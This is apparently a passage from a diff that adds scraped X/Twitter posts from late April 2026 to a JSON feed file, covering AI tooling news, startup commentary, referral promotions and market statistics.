"https://x.com/lxfater/status/2049368609193926810", + "published_at": "2026-04-29T06:02:06+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "\"Savings Tax.\"", + "url": "https://x.com/naval/status/2049368528445403351", + "published_at": "2026-04-29T06:01:47+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Elon Musk on AI during the OpenAI trial:\n\n\"It (AI) could make us more prosperous, but it could also kill us all. We want to be in a Gene Roddenberry movie, like Star Trek, not so much a James Cameron movie, like Terminator.\n\nHe then elaborated by comparing AI training to almost like raising a child: \n\n\"It’s like if you had a very smart child — at the end of the day when the child grows up, you can’t really control that child, but you can try to instill the right values. Honesty, integrity, caring about humanity —being good, essentially.\"", + "url": "https://x.com/elonmusk/status/2049367366824305013", + "published_at": "2026-04-29T05:57:10+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "拼接两段 15s的忠犬八公动漫视频\n\n很不错哈", + "url": "https://x.com/GoSailGlobal/status/2049361252804427850", + "published_at": "2026-04-29T05:32:52+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "OpenAI may no longer be a nonprofit but it continues to be—and may always be—a “never made a profit”", + "url": "https://x.com/GaryMarcus/status/2049352224547975422", + "published_at": "2026-04-29T04:57:00+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯\n\n策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊\n\nTria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=mindo\n\n排名规则分三块:\n1️⃣ DEX 交易量\n2️⃣ 信用卡办理加消费\n3️⃣ 创作者影响力\n我的打法是主攻第三项,前两项用最小成本蹭基础分,集中火力打内容 💡\n\n这种活动本质是用内容换影响力再变现。不用每天盯着链上烧 Gas,也不用拼资金体量,持续输出好内容慢慢把排名做上去就行 ⚡ 而且 Tria 背靠 Hyperliquid 和 Aptos,近期上了永续合约和收益产品,Mindo 又是 AI 热点,两个合在一起创作素材很充裕,叙事空间够大 🎁\n\n建议想参与的创作者多结合产品最新动态做内容增量,交互上优先做一次操作长尾生效的任务,别分散精力去追全部。控制节奏,这个活动的长尾收益会比看起来更可观 👀", + "url": "https://x.com/chuxiaeth/status/2049351176433623539", + "published_at": "2026-04-29T04:52:50+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: Apple: http://apple.co/4cF5VWZ\n\nSpotify: http://open.spotify.com/episode/5C1aTaJwlpkGC7Lj0cqDrx\n\nYouTube: http://youtu.be/hTdSU7q5WCo\n\nTranscript: http://nav.al/code\n\n—\n\nPresented by AngelList: http://angellist.com/podcast", + "url": "https://x.com/naval/status/2049349252112089553", + "published_at": "2026-04-29T04:45:11+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "New podcast on vibe coding - A Return to Code.\n\nA Return to Coding 00:20\n\nThe Personal App Store 03:17\n\nVibe Coding Is a Video Game with Real-World Rewards 06:22\n\nPure Software Is Uninvestable 10:33\n\nA Place for Each Model 14:22\n\nAI Is Eager to Please 17:57\n\nWhy Math and Coding? 22:10\n\nThe Beginning of the End of Apple’s Dominance 24:17\n\nCoding Agents As Customer Service Reps 27:55", + "url": "https://x.com/naval/status/2049349249905951175", + "published_at": "2026-04-29T04:45:10+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "未来属于设计 测评 和 运营", + "url": "https://x.com/Pluvio9yte/status/2049347785456316549", + "published_at": "2026-04-29T04:39:21+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Matt Pocock 的 Skill 框架 · 跟其他三家的差异\n\n项目链接:http://github.com/mattpocock/skills · 38K stars · MIT · 单人维护、日活更新\n\n一句话:把资深工程师的纪律装进 Claude Code,让 vibe coder 也能写出能上线的代码。\n\n含 16 个 skill:tdd / diagnose / improve-codebase-architecture / to-prd / to-issues / triage / grill-me / zoom-out / git-guardrails / write-a-skill / caveman 等。\n\n1️⃣ vs anthropic/skills · 「格式」vs「流程」\n\nanthropic 做的: pdf · xlsx · docx · pptx · skill-creator\n ↑ 文件格式 skill — 给 Agent 加「读写文件」的能力\n\n差别:Anthropic 给四肢,Matt 给教练笔记。前者扩展能力边界,后者塑造行为模式。装 anthropic 之后你的 Claude 能做更多事;装 Matt 之后你的 Claude 做事方式不一样了\n\n2️⃣ vs obra/superpowers · 「小而精 + 哲学」 vs 「包罗万象」\n\nmattpocock superpowers Skill 数 16 \n50+ 设计风格 引用 Pragmatic Programmer / DDD / Ousterhout 的经典原则 自创规则、自成体系 \n\n每个 skill 的「为什么」 配一段经典书摘做锚点 没有 强制度 高 极高(DO NOT 列表更长) \n\n启动时间 / Token 消耗 3.8s / 2,580 tok 8.7s / 4,820 tok\n\n差别:Matt 把 skill 框成「编码的智慧」,Jesse 把 skill 框成「合规的流程」。前者优雅、可读;后者严苛、稳定。Matt 的 16 个 skill 你能记得住,superpowers 的 50+ 你只记得「装上之后什么都得跑一圈」\n\n3️⃣ vs kentcdodds/compound-engineering · 「solo-dev 纪律」vs 「agent 编排」\n\nmattpocock compound-engineering 服务对象 一个人 Agent 集群 价值机制 即刻见效 复利累积(6 个月才显化) \n\n状态 无状态 自我反思 + improvements.log 6 月留存率 ~55% 78%(4 框架最高) 上手难度 低 高\n\n差别:Matt 解决「我现在该怎么动手」,Kent 解决「我的 Agent 该怎么变聪明」。前者实用主义、立即生效;后者长期主义、未来主义。Matt 的 skill 装上 5 分钟就有用,compound-engineering 要等半年看复利\n\n🌟 一句话定位\nanthropic 给工具,Matt 给纪律,Jesse 给流水线,Kent 给成长机制\n\n这 4 个框架不是替代关系:重度用户通常装 anthropic(工具)+ Matt(纪律)+ superpowers(关键代码段) 三件套", + "url": "https://x.com/GoSailGlobal/status/2049339826877665496", + "published_at": "2026-04-29T04:07:44+00:00", + "source": "nitter", + "title_zh": "Mattpocock推出的Skill框架获GitHub38K星标,通过16项模块化技能将资深工程师代码规范系统化注入Claude Code,区别于Anthropic的AI能力扩展和Obra的实践哲学设计,形成更规范化的代码生成流程体系。" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "x.com/i/article/204933030407…", + "url": "https://x.com/GoSailGlobal/status/2049336319286063302", + "published_at": "2026-04-29T03:53:48+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我就知道🤣🤣🤣", + "url": "https://x.com/dingyi/status/2049335171066061234", + "published_at": "2026-04-29T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about:\n\n\"Won’t the frontier labs just do everything?\"\n\nYes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build amazing startups:\n\nOpenAI is not going to build a cattle-herding drone, buy an old F-150 and drive from ranch to ranch like the founder of one of the fastest-growing YC W26 startups, Graze Mate.\n\nAnthropic is not going to integrate with dental insurance verification systems (Lance).\n\nGoogle is not going to navigate NATO procurement (Milliray).\n\nThe value is in the last mile, not the model. Sales cycles require humans who understand the customer. And most importantly, the market is expanding, not shrinking: AI isn't cannibalizing the existing 1% software spend — it's unlocking the other 5-6% that was going to humans. That's a much bigger market for startups yet-to-be-founded than the one the labs are playing in.\n\nNow, what DOES seem risky?\n\nA thin UI layer on top of ChatGPT with no domain expertise; a general-purpose chatbot or assistant; or a product that gets obsolete when model capabilities improve.\n\nBut — tools for specific industries; \"full-stack\" AI companies that actually are the service (AI law firm, AI accounting firm, AI uranium exploration company); or generally products where the customer doesn't want a tool but an outcome — are defensible ideas for startups.", + "url": "https://x.com/paulg/status/2049333482271260710", + "published_at": "2026-04-29T03:42:31+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: The exact same question to Grok 4.3, GPT 5.5, and Claude Opus 4.7:\n\n“Count to 10 starting from 11”\n\nGrok 4.3 wins 🏆\nEvery single time\n\nIt gave 11, 10 and explained why going backwards was the only logical move... The others started counting from 11 to 20\n\nGrok’s logical reasoning is at a level most models still can’t even touch", + "url": "https://x.com/elonmusk/status/2049332159601942995", + "published_at": "2026-04-29T03:37:16+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: What do the smartest kids in the world do when they grow up?\n\nI did the largest study of ~18,000 International Olympiad medalists (IMO, IOI and IPhO) over the last 25yrs, arguably the sharpest analytical minds of the world in high school, to see where they ended up and traced ~50% of them.\n\nFounders of ~20 unicorns and ~7 decacorns and ~10 billionaires: OpenAI, Cursor, Stripe, Databricks, Perplexity, Ethereum, Cognition, Hyperliquid, Fireworks, Modal, Quora, Parallel, Cartesia, Wispr\n\nMost kids went to MIT, a whopping 12% of them, followed by Cambridge (7%) and Sharif (3%)!\n\nThe career paths they chose (of those who graduated) were:\n— 36% Academia (professors)\n— 26% Other\n— 22% in Software / Tech\n— 12% in Quant / Finance\n— 5% Founders!\n\nThe biggest employer was Google, by far, at 6%.\nOthers interesting tidbits were:\n— 47 of them work at Jane Street (#3)\n— 38 at OpenAI (#5)\n— 15 at Anthropic\n— 8 at Cognition\n— 6 at Isomorphic Labs\n\nOlympiaders were 1500x more likely to be billionaires and 4000x more likely to be unicorn founders than the average person!", + "url": "https://x.com/paulg/status/2049330123464393084", + "published_at": "2026-04-29T03:29:10+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 海报图片提示词 :\n\n请生成一张随机的瑜伽宣传海报拼贴总图。\n整体要求:\n在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报\n每张卡面尺寸随机设计铺满整张图\n卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开\n整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报\n每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化\n所有海报统一保持高级、专业、吸引人,适合瑜伽课程宣传、社媒推广、品牌视觉展示\n\n分镜摆姿势提示词:将图一的女性改为图二的4,5姿势,生成图片\n\n视频提示词:根据首尾帧生成丝滑的,就是专业瑜伽演示的视频,要求运镜丝滑\n\n注册体验领积分👉https://flowith.io?inv=TIECHUIREN,喜欢的可以试试", + "url": "https://x.com/lxfater/status/2049329956153352499", + "published_at": "2026-04-29T03:28:30+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 如何使用Agent 模式 3 步:\n\n选图像模式\n选GPT-2-image\n点 Agent 按钮\n\n利用下面给的提示词,出了分镜图和人设图\n\n接下来,利用分镜图和人设图,我们就可以控制人物动作啦!!\n\n如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示)\n\n得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了\n\n多个视频就可以出系列的瑜伽动作\n\nflowith的高级套餐包含 GPT Image 2 和 Nanobanana 2 flash 无限生成\n需要的可以使用下面链接,注册送积分:https://flowith.io?inv=TIECHUIREN\n\n图片和视频提示词都在下一条👇", + "url": "https://x.com/lxfater/status/2049329950495310198", + "published_at": "2026-04-29T03:28:29+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "做内容运营,生图生视频,你现在还在跑好几个工具吗?\n\n被朋友拉去做瑜伽图,搭了无数工作流\nGPT Image 2 出来后,发现全废了\n\n得重新规划一套,但这几天身体不舒服,没心思搞\n随手把提示词扔进 flowith 试了一下\n\n以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。\n\n它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整\n\n分镜图和人物图来生成出首末两张图片,用视频模式可灵模型,简单的演示视频,一条链路打通,全在一个工具里面\n\nAgent 模式还能联网,生成下周海报日历,日期星期都是对的,普通的生图模型记忆估计2025年\n\n这条链路怎么跑起来,看我下面细细说来👇", + "url": "https://x.com/lxfater/status/2049329944052859141", + "published_at": "2026-04-29T03:28:28+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "4/29 AI 圈速览\n\n• OpenAI 全系正式登陆 AWS:GPT + Codex + 托管 Agent 一并上线\n\n• Anthropic 拒接军方合作,Google 顺势签下五角大楼新合同\n\n• Claude Code 系统提示 Bug:托管 Agent 失效 + 用户 token 被空转烧光\n\n• mattpocock 开源个人 .claude Skills 目录:工程师级实战合集\n\n• Composio 发布 awesome-codex-skills:Codex 跨平台自动化即插即用\n\n• Lovable Vibe Coding 上线 iOS/Android:手机随时建站建 App\n\n• Andrew Ng:AI 原生小团队工程师/PM 比从 8:1 压到 1:1\n\n• 论文:SFT 微调会破坏旧知识引发幻觉,持续学习技术或可解\n\n今天最值得盯紧的是 Skills 生态的三重爆发:Claude Code 的 Bug 暴露了 Managed Agent 的脆弱性,而 mattpocock 和 Composio 同日开源的两个 Skills 库恰好填补了空白——工具在进化,生产级 Skills 的稀缺正在成为真正的护城河。\n\n详情 👉 http://jasonzhu.ai/zh/news/2026-04-29", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546", + "published_at": "2026-04-29T03:20:42+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "🔥 今日新鲜 Skills 精选 Top 10(4月29日)\n由 http://agentskillshub.top 整理!发现 67000+ AI Agent 工具,每日更新 🚀\n\nMozilla 出手做统一 LLM 接口 + 跨领域 MCP 扩张,今日生态边界被拓得最宽!!!\n\n1️⃣ mozilla-ai/any-llm\n⭐ 1928 | +1928\nMozilla AI 出品——一个接口跟所有 LLM provider 通信,挑战 LiteLLM\n🔗 https://github.com/mozilla-ai/any-llm\n🌐 https://agentskillshub.top/skill/mozilla-ai/any-llm/\n\n2️⃣ 🆕 nexu-io/open-design\n⭐ 1120 | +336\nAnthropic Claude Design 的本地化开源复刻,19 个 Skills + 71 个 brand-grade Designs\n🔗 https://github.com/nexu-io/open-design\n🌐 https://agentskillshub.top/skill/nexu-io/open-design/\n\n3️⃣ chainstacklabs/polyclaw\n⭐ 333 | +333\nPolymarket 交易 OpenClaw skill——浏览预测市场 + 执行交易 + 跟踪持仓\n🔗 https://github.com/chainstacklabs/polyclaw\n🌐 https://agentskillshub.top/skill/chainstacklabs/polyclaw/\n\n4️⃣ mkurman/zorai\n⭐ 294 | +294\n持久化、多 agent、可审计的学习型执行平台,daemon 守护 agent 协作\n🔗 https://github.com/mkurman/zorai\n🌐 https://agentskillshub.top/skill/mkurman/zorai/\n\n5️⃣ mcpware/cross-code-organizer\n⭐ 283 | +283\n跨 harness 的配置 dashboard——同时管 Claude Code/Codex/Cursor/Cline 配置\n🔗 https://github.com/mcpware/cross-code-organizer\n🌐 https://agentskillshub.top/skill/mcpware/cross-code-organizer/\n\n6️⃣ witchan/ios-mcp\n⭐ 217 | +217\niOS MCP for 越狱 iPhone——给开发者和 AI agent 的 iOS 设备管理\n🔗 https://github.com/witchan/ios-mcp\n🌐 https://agentskillshub.top/skill/witchan/ios-mcp/\n\n7️⃣ zhitongblog/solomd\n⭐ 193 | +193\nMarkdown editor + 内置 MCP server,本地优先,MIT,~15 MB\n🔗 https://github.com/zhitongblog/solomd\n🌐 https://agentskillshub.top/skill/zhitongblog/solomd/\n\n8️⃣ ghbalf/freecad-ai\n⭐ 167 | +167\nFreeCAD 的 AI workbench——自然语言生成 3D 模型\n🔗 https://github.com/ghbalf/freecad-ai\n🌐 https://agentskillshub.top/skill/ghbalf/freecad-ai/\n\n9️⃣ MinishLab/semble\n⭐ 112 | +86\n专为 Agent 设计的快速准确代码搜索引擎\n🔗 https://github.com/MinishLab/semble\n🌐 https://agentskillshub.top/skill/MinishLab/semble/\n\n🔟 🆕 trapoom555/claude-paperloom\n⭐ 47 | +4\nClaude Code 自维护学术知识图谱插件,对接 Obsidian\n🔗 https://github.com/trapoom555/claude-paperloom\n🌐 https://agentskillshub.top/skill/trapoom555/claude-paperloom/\n\n🎯 今日趋势:生态边界拓宽 — Mozilla(统一接口)/ Polymarket(金融预测)/ FreeCAD(3D 建模)/ iOS(移动越狱)/ Markdown 编辑器 / 学术知识图谱,全部有人在做 skill/MCP 接入 🔍", + "url": "https://x.com/GoSailGlobal/status/2049327853469310984", + "published_at": "2026-04-29T03:20:09+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Gary, that was a great article. Wonderful work as always sir. You have been proven accurate once again.", + "url": "https://x.com/GaryMarcus/status/2049325506764677608", + "published_at": "2026-04-29T03:10:50+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "有做 摄影行业 的朋友吗,有个项目想聊一聊😊", + "url": "https://x.com/gkxspace/status/2049325117998592311", + "published_at": "2026-04-29T03:09:17+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "RT by @realNyarime: 基于大家的评论,看来大家都想要 token,所以这次我打算这样庆祝。\n\n关注我 @aiandcloud 并转发 + 评论这条内容,5 月 8 日开奖, 送 $100 GPT-5.5 API token,有效期两个月。\n如果活动期间到了 2K fo,就再加一个 $200 的名额,万一到 3K 就加个 $300 的也行!\n\n感谢大家的支持!🥰", + "url": "https://x.com/realNyarime/status/2049321411420811479", + "published_at": "2026-04-29T02:54:33+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the ability of this man to sell things he doesn’t believe in is truly extraordinary", + "url": "https://x.com/GaryMarcus/status/2049321182089081059", + "published_at": "2026-04-29T02:53:39+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "好消息:沪爷可以去金马了\n坏消息:需要到福建的出入境办大通证(往来台湾通行证)和签注", + "url": "https://x.com/realNyarime/status/2049317496361292240", + "published_at": "2026-04-29T02:39:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: at this point @ajambrosino is mogmogging\n\nenjoy the next few updates", + "url": "https://x.com/sama/status/2049315574120055054", + "published_at": "2026-04-29T02:31:21+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Image", + "url": "https://x.com/sama/status/2049314532892475791", + "published_at": "2026-04-29T02:27:13+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "群里讨论开源 bot,多数人共识就一句话:赚钱的 bot 没人会开源。\n\n听着像废话,但这个常识在 AI 时代变得尖锐——\n\n以前护城河是\"代码会写\"。现在 github 丢给 AI,几秒钟读完整个架构。重写成本从两个月变成两小时。\n\n护城河从\"代码会写\"变成\"策略会想\"。\n\n这件事我自己也在分层做——\n\npolymarket-toolkit 我开源(仓库https://github.com/runesleo/polymarket-toolkit),它解决的是数据采集、API 调用这类工具层的事。复用价值大,门槛低,开源等于做品牌。\n\nH 系列做市/taker 策略我不开源。里面是 sigmaD1 校准、做市 reprice 阈值、adverse selection 的实证参数。这些东西公开出来,相当于把研究路径直接送给同行——edge 一旦 commoditize 就没了,不管原来有没有 edge。\n\n中间还有一档:方法论可以写,具体参数不能写。pm-quant 付费源码包(https://leolabs.me/pm-quant)走的就是这层——19 个策略 + 加密 zip + 1on1 部署支持。付费门槛 = 过滤同行竞争。\n\n群里有人点 gabagool 这个高手地址:5min / 15min / 小时各级别都跑赢,\"不管行情都飞起\"。他的代码不在 github。市场已经用脚投票了。\n\n所以\"开源 bot 都亏钱\"是幸存者偏差决定的——能赚钱的人没有开源动机。你看到 ⭐ 几千、全是好评、作者还在持续更新的量化仓库,多半是个披着量化外壳的内容产品:开源是吸引订阅/付费的入口,不是核心收入。\n\n工具层开源、策略层闭源、方法论可分享、参数不可分享——这条线在 PM 量化圈里其实很清晰。\n\n护城河没消失,只是从\"代码会写\"换成\"策略会想\",从\"工具\"换成\"判断\"。\n\nPM 上扒数据 / 研究地址:https://polymarket.com/?r=runesleo&via=runes-leo&utm_source=x&utm_content=opensource-bot-moat&v…", + "url": "https://x.com/runes_leo/status/2049311708330459226", + "published_at": "2026-04-29T02:16:00+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "说个冷知识\n\n云服务厂商还是很有投资眼光的\n\n原价或者加价买了H100,现在还能卖那个价,甚至更高\n\n另外他还能出租5年保修期内的机器\n\n这不妥妥当下最具价值的投资品类嘛", + "url": "https://x.com/GoSailGlobal/status/2049307192692781200", + "published_at": "2026-04-29T01:58:03+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "R to @charliebilello: x.com/charliebilello/status/…", + "url": "https://x.com/charliebilello/status/2049306875301130507", + "published_at": "2026-04-29T01:56:48+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: #BREAKING: Chairman @Jim_Jordan invites Southern Poverty Law Center Interim CEO and President Bryan Fair to testify publicly on Wednesday, May 20, 2026, at 10:00 a.m.", + "url": "https://x.com/elonmusk/status/2049306669352358192", + "published_at": "2026-04-29T01:55:58+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "US home prices increased 0.7% over the last year, the slowest growth rate since June 2023. There are currently a record 46% more sellers than buyers nationally. Absent manipulation from the Federal Government/Reserve, prices will come down and homes will become more affordable.", + "url": "https://x.com/charliebilello/status/2049306480071873011", + "published_at": "2026-04-29T01:55:13+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Ghostty 离开 GitHub,同一天 Warp 宣布开源。\n\nWarp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。\n\n还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!", + "url": "https://x.com/dingyi/status/2049304499093946475", + "published_at": "2026-04-29T01:47:21+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人”\n\n技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作\n\n更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性", + "url": "https://x.com/gkxspace/status/2049302176900501544", + "published_at": "2026-04-29T01:38:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"SBC becomes a problem when stock prices fall and dilution explodes.\n\nWhat was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape.\n\nThe fix is to be far more selective, give equity to the top performers who drive value, and pay the rest in cash so you control dilution.\"\n\nTo what extent is SBC the crux of the problem and has it ever been a better time to be a founder or operator given this @honam @infoarbitrage @paulbonnet @markpinc", + "url": "https://x.com/HarryStebbings/status/2049298621951058341", + "published_at": "2026-04-29T01:24:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Since the start of the Iran war...\nJet Fuel: +70%\nSulfur: +60%\nBrent Crude Oil: +52%\nHeating Oil: +52%\nWTI Crude Oil: +48%\nUrea: +48%\nDiesel: +45%\nGasoline: +40%\nEuropean Nat Gas: +36%\nFertilizer: +23%\nPalm Oil: +12%\nCoal: +11%\nWheat: +10%\nIron Ore: +8%\nS&P 500: +4%\n$VIX: -10%", + "url": "https://x.com/charliebilello/status/2049298490489004357", + "published_at": "2026-04-29T01:23:28+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: 我和张凯的GEO论文,在全球最大的论文平台http://arxiv.org完成审核并正式发布\n这应该是全球第二篇与GEO有关的专项论文\n\n论文基于今年3月份最新的数据,包括602条 Prompt、21143 条引用、23745条AI抓取记录,最终形成的一版正式的GEO专项研究报告,欢迎查阅\n\n如果对大家能有帮助,我们打算后面继续抓取更多的数据,进行专项研究并开放研究成果\n\n网页地址:https://arxiv.org/abs/2604.25707\n论文PDF:https://arxiv.org/pdf/2604.25707\n\n源数据GitHub地址:https://github.com/yaojingang/geo-citation-lab", + "url": "https://x.com/GoSailGlobal/status/2049298176935690588", + "published_at": "2026-04-29T01:22:14+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "搭配收集免费模型的开源项目 使用这篇文章更佳\n\nhttps://github.com/cheahjs/free-llm-api-resources", + "url": "https://x.com/Pluvio9yte/status/2049296905382035945", + "published_at": "2026-04-29T01:17:10+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Following future rollout of FSD V14 Lite for HW3 vehicles in the US, we plan on expanding V14 Lite to additional international markets.\n\nThis update ensures that HW3 vehicle owners will continue to benefit from ongoing software updates.\n\nSince international rollout is subject to several factors (completion of technical verification, regional adaptation & relevant regulatory approvals), we can't provide definitive dates at the moment, but will provide updates on a rolling basis", + "url": "https://x.com/elonmusk/status/2049296822162874685", + "published_at": "2026-04-29T01:16:51+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "昨天试着申请了小米百万亿Token补贴,也收到了雷总送的7亿token,有效期一个月\n支持OpenAI和Anthropic端点,也有提供Claude Code等AI软件接入文档,看得出MiMo团队很用心在做这个事情\n\n接下来一个月,我会用MiMo V2.5对接OpenClaw尝试Vibe一个项目并开源,也期待国产LLM越做越好!", + "url": "https://x.com/realNyarime/status/2049296454905393361", + "published_at": "2026-04-29T01:15:23+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Big Zesty 💪", + "url": "https://x.com/jason/status/2049294394075849059", + "published_at": "2026-04-29T01:07:12+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "x.com/i/article/204914647001…", + "url": "https://x.com/Pluvio9yte/status/2049293145670836459", + "published_at": "2026-04-29T01:02:14+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。\n\n和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。", + "url": "https://x.com/svwang1/status/2049289806241550791", + "published_at": "2026-04-29T00:48:58+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Ookla says @Starlink has been a game-changer for inflight Wi-Fi speeds. Their new report ranks which airline has the fastest Wi-Fi:\n\n\"Starlink stood out for its speed. Of over 50 airlines evaluated, the eight airlines that exceeded 100 Mbps median download speed and half of those clocking over 300 Mbps in 2H 2025 were served by Starlink. No other IFC provider approached triple-digit speeds. Conversely, no airline with Starlink was below 100 Mbps median download speed.\n\nThe consistency and download speed performance results of Starlink’s IFC are game changing. Sometimes when wireless networks experience rapid growth, the increased number of users and larger volume of data traffic can result in slower speeds for everyone. This has not been the case for Starlink.\"\n\nIt's pretty clear at this point that airlines not adopting Starlink are going to be at a pretty big disadvantage compared with the airlines that do. In some cases, we're already seeing passengers specifically searching for flights with Starlink Wi-Fi.", + "url": "https://x.com/elonmusk/status/2049283488600277368", + "published_at": "2026-04-29T00:23:52+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Super high bandwidth to commercial aircraft with @Starlink", + "url": "https://x.com/elonmusk/status/2049279898976702535", + "published_at": "2026-04-29T00:09:36+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Oh lordy... here comes the lawfare madness again 🤦\n\n86 when I grew up in the restaurant business meant “to get rid of” something (ie “86 clams” meant to take clams off the menu). \n\nI was told it had two origins:\n\n1. 86 Chumley's, which was the address of the speakeasy in Manhattan. They would 86 something on the menu there. \n\n2. I was also told it was eight feet long and 